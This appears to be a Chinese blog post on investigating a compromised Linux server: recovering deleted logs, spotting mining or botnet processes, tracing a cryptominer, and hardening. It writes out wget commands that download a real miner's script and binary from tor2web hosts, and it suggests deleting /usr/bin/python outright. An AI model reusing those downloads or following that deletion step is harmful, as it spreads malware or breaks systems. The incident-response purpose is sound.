Loading [MathJax]/jax/output/CommonHTML/config.js
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >Linux服务器被黑 排查思路(下)

Linux服务器被黑 排查思路(下)

原创
作者头像
陈不成i
修改于 2021-05-26 06:25:36
修改于 2021-05-26 06:25:36
1.3K00
代码可运行
举报
文章被收录于专栏:ops技术分享ops技术分享
运行总次数:0
代码可运行

日志恢复

1.查看到日志不存在,被删除了 ll /var/log/secure

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
ls: cannot access /var/log/secure: No such file or directory

2.查看是否有进程在使用这个文件,可以看到rsysload进程在使用,pid号是1264,使用者root,打开的文件描述符是4,结尾的状态是文件已经被删除。 lsof | grep /var/log/secure

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
rsyslogd   1264      root    4w      REG                8,1  3173904     263917 /var/log/secure (deleted)

3.查看对应pid号的文件描述符,可以看到对应的文件内容。 tail /proc/1264/fd/4

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Sep 20 16:47:21 hlmcen69n3 sshd[38511]: pam_unix(sshd:session): session closed for user stoneSep 20 16:47:21 hlmcen69n3 su: pam_unix(su-l:session): session closed for user rootSep 20 16:49:30 hlmcen69n3 sshd[38605]: pam_unix(sshd:session): session closed for user test01Sep 20 16:50:04 hlmcen69n3 sshd[38652]: reverse mapping checking getaddrinfo for 190.78.120.106.static.bjtelecom.net [106.120.78.190] failed - POSSIBLE BREAK-IN ATTEMPT!

4.用重定向的方法恢复日志, cat /proc/1264/fd/4 > /var/log/secure

找到异常进程-1

1.如果发现机器产生了异常流量,可以抓取网络包查看流量情况或者查看流量情况。通常作为肉鸡用于去攻击其它机器的时候,网络出口流量会异常的大。 命令:tcpdump | iperf

2.查看当前开启的进程服务,一般脚本病毒会开启udp端口来作为肉鸡攻击其它机器,查找有问题的进程。 命令:netstat -unltp

3.通常异常进程都比较消耗资源,比如挖矿脚本最消耗资源,查看哪个进程消耗资源做多 命令:top

4.如果找到怀疑的进程,找到pid号,可以看到启动命令 ll /proc/1850/ | grep -i exe

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
lrwxrwxrwx. 1 root root 0 Sep 15 12:31 exe -> /usr/bin/python

5.找到那个文件,并删除掉。 ll /usr/bin/python``rm -rf /usr/bin/python

6.同时搜索类似文件名的文件是否存在,不过可能文件名会改变 find / -name python -type f

找到异常进程-2

1.如果上面方法没找到,则用ps命令来获取信息。 和其它机器对比,找出有问题的进程,基本上系统启动后就那几个进程,再加上服务器运行的服务,进程数量相对比较固定。 命令:ps -aux

2.找到有问题的pid号后,查看相关进程,一起kill掉杀死。 pstree -p

3.可以看到进程的树状图,还有分支出来的其它子进程,一起kill掉,再删除程序。

找到异常进程-3

1.查看日志或者crontab中,如果找到有相关的执行脚本的操作,可以去用搜找那些文件。

crontab -l看到的,如下是真实被入侵挖矿后看到的 ![](http://52wiki.oss-cn-beijing.aliyuncs.com/doc/759791cd288a9bfcda786b1571f138b127a733f5.png)

2.下载第一个并不执行 wget -qO- -U- https://ddgsdk6oou6znsdn.tor2web.io/i.sh

3.显示如下,先判断/tmp/.X11-lock所记录的pid是否存在,不存在将下载一个可执行文件,加权限后并启动,再删除自己。

4.只下载脚本并不执行,看来人家的脚本还分系统,针对挖矿 wget -qU- http://malwregafeg2fdjn.tor2web.me/.$(uname -m)

5.看到目录下有个.X86_64的几百KB的可执行文件,不知道拿啥语言写的,手动运行它后,会先删除自己,再运行一会才开始挖矿。

可以查看这个pid,来看看它在做什么。 strace -p pid号

6.我用如下命令获取一个文件,在这个挖矿脚本运行2分钟后,将pid杀死,查看文件内容。 strace -p pid号 &> du.txt

可以从中看到一些信息,如果有open,conle之类的字样,可以看看他在打开哪些文件,找到路径后删除掉。

找到异常进程-4

1.查询所有命令信息,看是否被篡改,可以看到最近更改和最近改动

2.那就根据关键字改,进行筛查,多查找几个日期和目录

3.还有可能是alias别名,查看是否有变化

4.如果对方可能改了文件,但修改了日期,那就用md5效验,和一台正常机器做对比。

三.总结

1.做好监控、对进程、登陆用户、在线用户等等监控。

2.除了提供服务的nginx之类的机器,其他mysql等等均不要开放外网,nginx那台也不对外开放22端口,只开放80端口。

3.设置跳板机,只通过跳板机进行登录,并限制访问的白名单地址,有需求可以设置短信和秘钥双因子验证。开源的有jumpserver和webterminal这些堡垒机软件。

4.nginx或者其他服务均使用单独的用户启动,并nologin消除登陆权限。

5.更改暴露在外面的服务器22端口改成别的,并禁止root直接登陆。

6.做好服务器定期镜像,因为被入侵后恢复很痛苦,最好的方法是直接还原镜像

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
11 个步骤完美排查Linux机器是否已经被入侵
原文:https://cloud.tencent.com/developer/article/1882357
入门笔记
2022/06/03
8040
Linux服务器被黑 排查思路(上)
开放了22远程登陆,开放了外网,就有可能被暴力破解登陆,对方一直尝试root密码而登陆进去了。
陈不成i
2021/05/26
2.5K0
一次服务器沦陷为肉鸡后的实战排查过程!
今天还没到公司就被电话告知办公室无法正常连接互联网了,网速非常慢,无法正常浏览网页。急急忙忙感到公司,开始查找问题。
民工哥
2020/09/16
9230
【应急响应】Linux入侵排查思路
当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。
Bypass
2019/07/08
2.9K0
【应急响应】Linux入侵排查思路
Linux 应急响应流程及实战演练
当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。
信安之路
2018/10/18
5.3K0
Linux 应急响应流程及实战演练
11 个步骤完美排查服务器是否被入侵
随着开源产品的越来越盛行,作为一个Linux运维工程师,能够清晰地鉴别异常机器是否已经被入侵了显得至关重要,个人结合自己的工作经历,整理了几种常见的机器被黑情况供参考:
用户8826052
2022/03/02
3.4K0
ssh登录太慢了,每次都要20s
大家工作时,少不了ssh登录各个服务器,我这边手里也有很多服务器,有一些登录很快就进去了,有些要卡半天才能进去。之前以为是公司网络问题,每次也就忍了,这次突然不想忍了,决定定位一下。
低级知识传播者
2024/04/15
4270
ssh登录太慢了,每次都要20s
Linux应急响应排查思路
当企业发生黑客入侵,系统崩溃或者影响其他业务逻辑的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查询入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或者减少损失。
Baige
2022/03/21
2.9K0
Linux应急响应排查思路
Linux手工入侵排查思路
当Linux主机发生安全事件需要进行入侵排查时,一般可以使用常见的shell命令,通过分析主机的异常现象、进程端口、启动方式、可疑文件和日志记录等信息以确认主机是否被入侵。
Bypass
2021/04/26
1.9K0
Linux 应急响应入门:入侵排查应该这样做
在排查服务器的时候,黑客没有在线,可以使用last命令排查黑客什么时间登录的有的黑客登录时,会将/var/log/wtmp文件删除或者清空,这样我们就无法使用last命令获得有用的信息了。
杰哥的IT之旅
2021/04/20
9690
服务器入侵排查流程
1.查询可疑端口、进程、ip:netstat -antlp | more 或者 netstat -anltp | grep pid,若存在可疑进程可通过 ls -l /proc/PID 查看PID对应的进程文件路径。
iginkgo18
2020/09/27
4K0
排查Linux机器是否已经被入侵
随着开源产品的越来越盛行,作为一个Linux运维工程师,能够清晰地鉴别异常机器是否已经被入侵了显得至关重要,个人结合自己的工作经历,整理了几种常见的机器被黑情况供参考。
小小科
2018/08/17
1.7K0
排查Linux机器是否已经被入侵
你的Linux服务器被黑了?看一看是不是犯了这5点错
本文由马哥教育Linux云计算面授班24期学员推荐,转载自互联网,作者为高俊峰,Linux资深技术专家,畅销书籍《循序渐进Linux》、《高性能Linux服务器构建实战》作者,内容略经小编改编和加工,观点跟作者无关,最后感谢作者的辛苦贡献与付出。 安全是IT行业一个老生常谈的话题了,从之前的“棱镜门”事件中折射出了很多安全问题,处理好信息安全问题已变得刻不容缓。 因此做为运维人员,就必须了解一些安全运维准则,同时,要保护自己所负责的业务,首先要站在攻击者的角度思考问题,修补任何潜在的威胁和漏洞,主要分五
小小科
2018/05/03
2.3K0
你的Linux服务器被黑了?看一看是不是犯了这5点错
应急响应笔记之Linux篇
整理下自己之前做的应急响应相关的碎片笔记,太多了,没办法全部列出来,先整理一些常用的。
瓦都剋
2020/08/07
1.1K0
从挖矿木马看后渗透维权
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
安恒网络空间安全讲武堂
2019/10/16
2.5K0
从挖矿木马看后渗透维权
Linux系统|Linux系统应急响应
当我们被告知一台Linux服务器被黑客入侵,黑客利用该服务器进行挖矿,并且在该服务器上放置了木马后门。现在我们需要对该服务器做排查,关闭和清除掉挖矿程序以及木马后门,探测出黑客是通过什么方式入侵该服务器的,并且最后要将该漏洞进行修补,以确保服务器的正常运行。
谢公子
2022/01/13
11.1K0
Linux系统|Linux系统应急响应
Linux日志-secure日志
作者介绍:简历上没有一个精通的运维工程师。请点击上方的蓝色《运维小路》关注我,下面的思维导图也是预计更新的内容和当前进度(不定时更新)。
运维小路
2024/11/01
1.3K0
Linux日志-secure日志
Linux 中 Tail 命令的 9 个实用示例
我们作为 Linux 用户,经常会操作那些在后台长时间运行的进程,这些进程被称作守护进程或服务。例如 Secure Shell (sshd)、Network Manager (networkd)、Volume Manager (LVM)、Cron 等都是服务的典型例子,这样的服务还有很多。
数据科学工厂
2024/12/30
2570
Linux 中 Tail 命令的 9 个实用示例
CPU占用率爆满,服务器遭遇挖矿如何排查
「太用力的人跑不远, 真正坚持到最后的人靠的不是激情,而是恰到好处的喜欢和投入。」
山河已无恙
2023/03/02
6.1K0
CPU占用率爆满,服务器遭遇挖矿如何排查
Linux 系统日志-secure,btmp,wtmp文件详解
Linux系统提供了全方位的日志记录。我们登录Linux系统之后做的事情Linux都有相应的日志记录。整个日志系统比较多。这里只介绍和登录比较密切相关的三个日志。
zinyan.com
2022/12/08
11.9K0
Linux 系统日志-secure,btmp,wtmp文件详解
相关推荐
11 个步骤完美排查Linux机器是否已经被入侵
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验